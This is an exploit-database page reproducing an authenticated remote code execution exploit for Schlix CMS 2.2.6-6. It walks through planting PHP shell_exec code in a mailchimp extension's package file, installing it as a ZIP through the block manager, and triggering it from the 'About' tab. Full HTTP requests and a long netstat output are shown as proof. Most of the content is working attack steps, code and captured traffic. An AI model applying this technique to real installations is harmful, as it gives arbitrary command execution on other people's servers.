Registerschlix cms 2.2.66 remote code execution (authenticated)
▸▸▸ Exploit & Vulnerability >> webapps exploit & multiple vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated) # Date: 2021-05-06 # Exploit Author: Eren SaraƧ # Vendor Homepage: https://www.schlix.com/ # Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip # Version: 2.2.6-6 # Tested on: Windows & WampServer ==> Tutorial <== 1- Login with your account. 2- Go to the block management section. Directory is '/admin/app/core.blockmanager'. 3- Create a new category. 4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp 5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory. 6- Paste this PHP code below and save it. ##################################### $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> ##################################### 7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'. 8- Install a package to created category and enter the installed 'mailchimp' extension. 9- Click the 'About' tab and our php code will be executed. ==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <== <?php $name = 'mailchimp'; $type = 'block'; $guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3'; $version = '1.0'; $license = 'MIT'; $description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.'; $author = 'Alip'; $url = 'https://github.com/calip/app_mailchimp'; $email = 'asalip.putra@gmail.com'; $copyright = 'Copyright ©2019 calip'; $command = shell_exec('netstat -an'); echo "<pre>$command</pre>"; ?> ==> HTTP Request (ZIP Extension Installation) <== POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: */* Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-Schlix-Ajax: 1 Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130 Content-Length: 51585 Origin: http(s)://(ORIGIN) Connection: close Referer: http(s)://(REFERER)/admin/app/core.blockmanager Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="_csrftoken" a3b9a0da8d6be08513f60d1744e2642df0702ff7 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip" Content-Type: application/x-zip-compressed ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# ############################################# -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload__total_file_size" 0 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="zipfileupload__max_file_count" 20 -----------------------------29322337091578227221515354130 Content-Disposition: form-data; name="password" # Your ACC Password. -----------------------------29322337091578227221515354130-- ==> HTTP Request (RCE - About Tab) <== GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http(s)://(HOST)/ Connection: close Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2 Upgrade-Insecure-Requests: 1 ==> HTTP Response (RCE - About Tab) <== HTTP/1.1 200 OK Date: Wed, 05 May 2021 21:49:24 GMT Server: Apache/2.4.46 (Win64) PHP/7.3.21 X-Powered-By: PHP/7.3.21 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 49575 <!DOCTYPE html> <html> <body> <div id="tab_options" class="schlixui-childtab"> <pre> Active Connections Proto Local Address Foreign Address State TCP 0.0.0.0:80 0.0.0.0:0 LISTENING TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:445 0.0.0.0:0 LISTENING TCP 0.0.0.0:902 0.0.0.0:0 LISTENING TCP 0.0.0.0:912 0.0.0.0:0 LISTENING TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING TCP 0.0.0.0:3307 0.0.0.0:0 LISTENING TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING TCP 0.0.0.0:50296 0.0.0.0:0 LISTENING TCP 127.0.0.1:80 127.0.0.1:58843 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58853 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58854 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58859 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58860 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58865 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58868 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58883 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58893 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58894 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58899 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58902 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58908 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58918 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58919 TIME_WAIT TCP 127.0.0.1:80 127.0.0.1:58924 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58886 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58887 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58888 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58891 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58905 CLOSE_WAIT TCP 127.0.0.1:8080 127.0.0.1:58907 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58911 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58913 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58915 TIME_WAIT TCP 127.0.0.1:8080 127.0.0.1:58916 TIME_WAIT TCP 127.0.0.1:58424 127.0.0.1:58425 ESTABLISHED TCP 127.0.0.1:58425 127.0.0.1:58424 ESTABLISHED TCP 127.0.0.1:58435 127.0.0.1:58436 ESTABLISHED TCP 127.0.0.1:58436 127.0.0.1:58435 ESTABLISHED TCP 127.0.0.1:58565 127.0.0.1:58566 ESTABLISHED TCP 127.0.0.1:58566 127.0.0.1:58565 ESTABLISHED TCP 127.0.0.1:58639 127.0.0.1:58640 ESTABLISHED TCP 127.0.0.1:58640 127.0.0.1:58639 ESTABLISHED TCP 169.254.22.167:139 0.0.0.0:0 LISTENING TCP 169.254.224.26:139 0.0.0.0:0 LISTENING TCP 192.168.1.8:139 0.0.0.0:0 LISTENING TCP 192.168.1.8:49500 95.101.14.77:443 ESTABLISHED TCP 192.168.1.8:57059 162.159.129.235:443 ESTABLISHED TCP 192.168.1.8:57902 162.159.138.234:443 ESTABLISHED TCP 192.168.1.8:58453 44.235.189.138:443 ESTABLISHED TCP 192.168.1.8:58626 162.159.138.232:443 ESTABLISHED TCP 192.168.1.8:58627 162.159.133.234:443 ESTABLISHED TCP 192.168.1.8:58699 162.159.135.232:443 ESTABLISHED TCP 192.168.1.8:58841 20.44.232.74:443 ESTABLISHED TCP 192.168.1.8:58942 162.159.138.232:443 ESTABLISHED TCP 192.168.1.8:58951 138.68.92.190:443 ESTABLISHED TCP 192.168.1.8:60549 51.103.5.159:443 ESTABLISHED TCP 192.168.1.8:60610 104.66.70.197:443 ESTABLISHED TCP 192.168.1.8:60611 104.66.70.197:443 ESTABLISHED TCP 192.168.1.8:60612 217.31.233.104:443 CLOSE_WAIT TCP [::]:80 [::]:0 LISTENING TCP [::]:135 [::]:0 LISTENING TCP [::]:445 [::]:0 LISTENING TCP [::]:3306 [::]:0 LISTENING TCP [::]:3307 [::]:0 LISTENING TCP [::]:7680 [::]:0 LISTENING TCP [::]:49664 [::]:0 LISTENING TCP [::]:49665 [::]:0 LISTENING TCP [::]:49666 [::]:0 LISTENING TCP [::]:49667 [::]:0 LISTENING TCP [::]:49668 [::]:0 LISTENING TCP [::]:50296 [::]:0 LISTENING TCP [::1]:3306 [::1]:58845 TIME_WAIT TCP [::1]:3306 [::1]:58856 TIME_WAIT TCP [::1]:3306 [::1]:58857 TIME_WAIT TCP [::1]:3306 [::1]:58858 TIME_WAIT TCP [::1]:3306 [::1]:58932 TIME_WAIT TCP [::1]:3306 [::1]:58935 TIME_WAIT TCP [::1]:3306 [::1]:58940 TIME_WAIT TCP [::1]:3306 [::1]:58950 TIME_WAIT TCP [::1]:3306 [::1]:58953 ESTABLISHED TCP [::1]:3306 [::1]:58954 ESTABLISHED TCP [::1]:49485 [::1]:49486 ESTABLISHED TCP [::1]:49486 [::1]:49485 ESTABLISHED TCP [::1]:49669 [::]:0 LISTENING TCP [::1]:58844 [::1]:3306 TIME_WAIT TCP [::1]:58845 [::1]:3306 TIME_WAIT TCP [::1]:58855 [::1]:3306 TIME_WAIT TCP [::1]:58856 [::1]:3306 TIME_WAIT TCP [::1]:58857 [::1]:3306 TIME_WAIT TCP [::1]:58858 [::1]:3306 TIME_WAIT TCP [::1]:58861 [::1]:3306 TIME_WAIT TCP [::1]:58862 [::1]:3306 TIME_WAIT TCP [::1]:58863 [::1]:3306 TIME_WAIT TCP [::1]:58864 [::1]:3306 TIME_WAIT TCP [::1]:58866 [::1]:3306 TIME_WAIT TCP [::1]:58867 [::1]:3306 TIME_WAIT TCP [::1]:58869 [::1]:3306 TIME_WAIT TCP [::1]:58870 [::1]:3306 TIME_WAIT TCP [::1]:58884 [::1]:3306 TIME_WAIT TCP [::1]:58885 [::1]:3306 TIME_WAIT TCP [::1]:58929 [::1]:3306 TIME_WAIT TCP [::1]:58930 [::1]:3306 TIME_WAIT TCP [::1]:58931 [::1]:3306 TIME_WAIT TCP [::1]:58932 [::1]:3306 TIME_WAIT TCP [::1]:58934 [::1]:3306 TIME_WAIT TCP [::1]:58935 [::1]:3306 TIME_WAIT TCP [::1]:58939 [::1]:3306 TIME_WAIT TCP [::1]:58940 [::1]:3306 TIME_WAIT TCP [::1]:58946 [::1]:3306 TIME_WAIT TCP [::1]:58947 [::1]:3306 TIME_WAIT TCP [::1]:58949 [::1]:3306 TIME_WAIT TCP [::1]:58950 [::1]:3306 TIME_WAIT TCP [::1]:58953 [::1]:3306 ESTABLISHED TCP [::1]:58954 [::1]:3306 ESTABLISHED UDP 0.0.0.0:5050 *:* UDP 0.0.0.0:5353 *:* UDP 0.0.0.0:5355 *:* UDP 0.0.0.0:53240 *:* UDP 0.0.0.0:53241 *:* UDP 127.0.0.1:1900 *:* UDP 127.0.0.1:62353 *:* UDP 127.0.0.1:63129 *:* UDP 192.168.1.8:137 *:* UDP 192.168.1.8:138 *:* UDP 192.168.1.8:1900 *:* UDP 192.168.1.8:2177 *:* UDP 192.168.1.8:63128 *:* UDP [::]:5353 *:* UDP [::]:5355 *:* UDP [::1]:1900 *:* UDP [::1]:63125 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:1900 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:2177 *:* UDP [fe80::e4d5:62f5:da3:2dae%21]:63124 *:* </pre> <div class="content"> <div class="row"> <div class="col-xs-12"> <div class="text-center"> <h1>mailchimp</h1> <p>v1.0</p><p>Author: <a href="mailto:asalip.putra@gmail.com">Alip</a></p> <p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p> <p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p> </div> </div> </div> </div> </div> </body>
Schlix cms 2.2.66 remote code execution (authenticated) Vulnerability / Exploit Source : Schlix cms 2.2.66 remote code execution (authenticated)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes